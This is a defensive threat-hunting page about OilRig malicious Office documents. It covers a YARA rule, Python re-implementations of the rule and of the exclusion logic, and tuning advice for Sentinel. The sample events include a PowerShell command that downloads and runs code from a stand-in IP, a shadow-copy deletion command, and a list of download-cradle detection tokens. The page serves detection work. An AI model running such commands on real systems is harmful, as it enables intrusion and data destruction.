The OilRig campaign delivered custom malware in malicious Office documents to establish persistence and exfiltrate data. The artifacts it leaves behind are low-severity on their own, so they require proactive hunting rather than waiting for an alert. SOC teams should run the rule below against documents collected from endpoints, mail gateways and file shares, forward the hits to Azure Sentinel, and investigate each match to identify long-term compromise and data theft.
YARA Rule
rule OilRig_Malware_Campaign_Gen3
{
    meta:
        description = "Detects malware from OilRig Campaign"
        author = "Florian Roth"
        reference = "https://goo.gl/QMRZ8K"
        date = "2016-10-12"
        hash1 = "5e9ddb25bde3719c392d08c13a295db418d7accd25d82d020b425052e7ba6dc9"
        hash2 = "bd0920c8836541f58e0778b4b64527e5a5f2084405f73ee33110f7bc189da7a9"
        hash3 = "90639c7423a329e304087428a01662cc06e2e9153299e37b1b1c90f6d0a195ed"
    strings:
        $x1 = "source code from https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.htmlrrrr" fullword ascii
        $x2 = "\\Libraries\\fireueye.vbs" fullword ascii
        $x3 = "\\Libraries\\fireeye.vbs&" fullword wide
    condition:
        ( uint16(0) == 0xcfd0 and filesize < 100KB and 1 of them )
}
The rule has three string patterns in its detection logic, and any one of them is enough for a match. The match is only evaluated, however, in a file whose first two bytes are D0 CF (the OLE2 compound-document magic, which uint16(0) reads little-endian as 0xcfd0) and whose size is below 100 KB. That restricts the rule to legacy binary Office documents such as .doc and .xls; OOXML containers (.docx, .docm) start with PK and never match, so for those scan the extracted vbaProject.bin, which is itself an OLE2 container. $x3 is a wide (UTF-16LE) string, and all three carry the fullword modifier, so a hit must not be immediately preceded or followed by an alphanumeric character. Deploy the rule wherever file content is available (endpoint scanners, mail-gateway sandboxes, file-share sweeps) and send the results to Azure Sentinel. The scenario and exclusion pairs that follow tune the process-telemetry hunting queries that accompany the rule; they are not part of the YARA condition and do not change what the rule matches.
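The condition above, re-implemented in plain Python as an added example (this is not code from the original page or from Florian Roth's signature-base, and it is an illustration of the logic rather than a replacement for running YARA). It shows what uint16(0) == 0xcfd0 actually tests, how filesize < 100KB is counted, how an ascii string differs from a wide one, and the fullword edge case in which the path string fails to match because a letter precedes it. The sample buffers are constructed inline; build_sample, rule_matches and matched_strings are names chosen for this example.

```python
# Added example, not part of the original page or of the signature-base rule:
# plain-Python re-implementation of the OilRig_Malware_Campaign_Gen3 condition so
# uint16(0), filesize, ascii/wide and fullword semantics can be checked on
# constructed byte buffers without yara-python. Use real YARA for production scans.
import re

OLE2_MAGIC = b"\xd0\xcf"   # uint16(0) reads little-endian, so 0xcfd0 is the byte pair D0 CF
MAX_SIZE = 100 * 1024      # YARA's 100KB is 100 * 1024 bytes; the test is strictly less-than

# The rule's strings as (text, modifier): "ascii" is the raw bytes, "wide" is UTF-16LE.
STRINGS = {
    "$x1": ("source code from https://www.fireeye.com/blog/threat-research/2016/05/"
            "targeted_attacksaga.htmlrrrr", "ascii"),
    "$x2": ("\\Libraries\\fireueye.vbs", "ascii"),
    "$x3": ("\\Libraries\\fireeye.vbs&", "wide"),
}


def fullword_pattern(text, modifier):
    """Compile one YARA string carrying the fullword modifier as a byte regex.

    fullword: the match may not be immediately preceded or followed by an
    alphanumeric character, regardless of what the string itself starts or ends
    with. For wide strings the neighbouring character is a 2-byte UTF-16LE unit."""
    if modifier == "ascii":
        body = re.escape(text.encode("ascii"))
        return re.compile(rb"(?<![0-9A-Za-z])" + body + rb"(?![0-9A-Za-z])")
    body = re.escape(text.encode("utf-16-le"))
    return re.compile(rb"(?<![0-9A-Za-z]\x00)" + body + rb"(?![0-9A-Za-z]\x00)")


PATTERNS = {name: fullword_pattern(text, mod) for name, (text, mod) in STRINGS.items()}


def matched_strings(data):
    """Names of the rule's strings present in data (the '1 of them' part)."""
    return [name for name, pat in PATTERNS.items() if pat.search(data)]


def rule_matches(data):
    """( uint16(0) == 0xcfd0 and filesize < 100KB and 1 of them )"""
    if data[:2] != OLE2_MAGIC:    # not an OLE2 compound document (legacy .doc/.xls)
        return False
    if len(data) >= MAX_SIZE:     # filesize < 100KB
        return False
    return len(matched_strings(data)) >= 1


def build_sample(payload, ole2=True, pad_to=0):
    """Constructed test file (not a real sample): OLE2 header, or a PK/OOXML
    header when ole2=False, followed by the payload and NUL padding."""
    header = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" if ole2 else b"PK\x03\x04"
    data = header + b"\x00" * 24 + payload + b"\x00" * 16
    return data + b"\x00" * max(0, pad_to - len(data))


if __name__ == "__main__":
    cases = {
        "quoted path in a macro": build_sample(b'Environ("PUBLIC") & "\\Libraries\\fireueye.vbs"'),
        "wide path ($x3)": build_sample("\\Libraries\\fireeye.vbs&".encode("utf-16-le")),
        "path glued to 'Public' (fullword fails)": build_sample(b"C:\\Users\\Public\\Libraries\\fireueye.vbs"),
        "same string in a PK/OOXML container": build_sample(b'"\\Libraries\\fireueye.vbs"', ole2=False),
        "OLE2 but 100 KB or larger": build_sample(b'"\\Libraries\\fireueye.vbs"', pad_to=MAX_SIZE),
    }
    for label, blob in cases.items():
        print(f"{label:42s} match={rule_matches(blob)!s:5s} strings={matched_strings(blob)}")
```

Note the third and fourth cases: the path string is present in both, but in one the preceding letter "c" of "Public" defeats fullword, and in the other the container is a zip, so uint16(0) is not 0xcfd0 and the strings are never consulted.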
Scenario: Legitimate system update or patching activity using msiexec.exe
Filter/Exclusion: process.name = msiexec.exe and (process.args contains " /quiet" or process.args contains " /passive")
Scenario: Scheduled backup job using vssadmin.exe to create shadow copies
Filter/Exclusion: process.name = vssadmin.exe and process.args contains " Create"
Scenario: Admin task using taskkill.exe to terminate a process for maintenance
Filter/Exclusion: process.name = taskkill.exe and process.args contains "/F /IM"
Scenario: Legitimate remote desktop session using mstsc.exe with administrative credentials
Filter/Exclusion: process.name = mstsc.exe and (process.args contains "/admin" or process.args contains "/console")
Scenario: Use of powershell.exe for routine system monitoring or log analysis
Filter/Exclusion: process.name = powershell.exe and (process.args contains "Get-Event" or process.args contains "Get-Counter")
Each exclusion is written with explicit grouping: the "or" applies to the argument substrings, not to the process name, and "Get-Event" already covers "Get-EventLog". The backup scenario is limited to shadow-copy creation; "vssadmin Delete" must stay visible because deleting shadow copies is a standard ransomware precursor (ATT&CK T1490, Inhibit System Recovery). All of these match substrings of the command line only, so an attacker can append Get-Counter to a malicious one-liner or pass /quiet to a malicious MSI. Before deploying them in Sentinel, scope each exclusion further, for example by parent process, binary signer, user, or the absence of download and encoded-command indicators on the same command line.
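The exclusions applied to constructed endpoint events, as an added example that is not part of the original page. It implements the process.name / process.args tests with the grouping written out, shows how a substring-only exclusion suppresses a malicious PowerShell command that merely ends in Get-Counter, and adds one tightening: the exclusion is vetoed when the same command line carries a download or encoded-command indicator. The event records and the SUSPICIOUS indicator list are assumptions made for this example, and is_excluded, is_excluded_strict and hunt are names chosen here.

```python
# Added example, not from the original page: the page's process-based exclusions
# evaluated over constructed telemetry, with explicit boolean grouping and a
# stricter variant that refuses to exclude command lines carrying suspicious tokens.
# Field names follow the page's process.name / process.args notation.

# (process name, argument substrings): name must match AND any one substring must appear.
EXCLUSIONS = [
    ("msiexec.exe",    [" /quiet", " /passive"]),
    ("vssadmin.exe",   [" Create"]),
    ("taskkill.exe",   ["/F /IM"]),
    ("mstsc.exe",      ["/admin", "/console"]),
    ("powershell.exe", ["Get-Event", "Get-Counter"]),   # "Get-Event" also covers "Get-EventLog"
]

# Assumed for this example (not from the page): tokens that veto any exclusion.
SUSPICIOUS = ("-encodedcommand", " -enc ", "iex (", "invoke-expression",
              "downloadstring", "frombase64string", "http://", "https://")


def is_excluded(event):
    """process.name = X and (process.args contains A or process.args contains B ...).
    Process names compare case-insensitively (Windows); substrings as written."""
    name = event["process.name"].lower()
    args = event["process.args"]
    return any(name == proc and any(needle in args for needle in needles)
               for proc, needles in EXCLUSIONS)


def is_excluded_strict(event):
    """Same exclusion, but never applied when the command line also contains a
    suspicious indicator: an attacker can append Get-Counter to a one-liner,
    but the download and encoding tokens remain on the same line."""
    if not is_excluded(event):
        return False
    lowered = event["process.args"].lower()
    return not any(token in lowered for token in SUSPICIOUS)


def hunt(events, strict=True):
    """Events left for analyst review after the exclusions are applied."""
    check = is_excluded_strict if strict else is_excluded
    return [e for e in events if not check(e)]


# Constructed sample telemetry for this example (not real logs).
EVENTS = [
    {"id": 1, "process.name": "msiexec.exe",
     "process.args": "msiexec.exe /i C:\\Windows\\Temp\\kb.msi /quiet /norestart"},
    # Lower-case "delete" is not covered by any exclusion and must stay visible (T1490).
    {"id": 2, "process.name": "vssadmin.exe",
     "process.args": "vssadmin.exe delete shadows /all /quiet"},
    # Malicious download cradle with a benign cmdlet appended to ride the exclusion.
    {"id": 3, "process.name": "powershell.exe",
     "process.args": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://203.0.113.5/a'); Get-Counter\""},
    {"id": 4, "process.name": "PowerShell.exe",
     "process.args": "PowerShell.exe -Command Get-EventLog -LogName System -Newest 50"},
]


if __name__ == "__main__":
    for e in EVENTS:
        print(e["id"], "excluded:", is_excluded(e), "strict:", is_excluded_strict(e))
    print("left for review (strict):", [e["id"] for e in hunt(EVENTS)])
```

With the substring-only logic, event 3 is silently dropped; the strict variant keeps it because "iex (", "downloadstring" and "http://" appear on the same command line. The veto list is a starting point, not a complete one, and it should be tuned against the environment's own baseline before it is trusted in Sentinel.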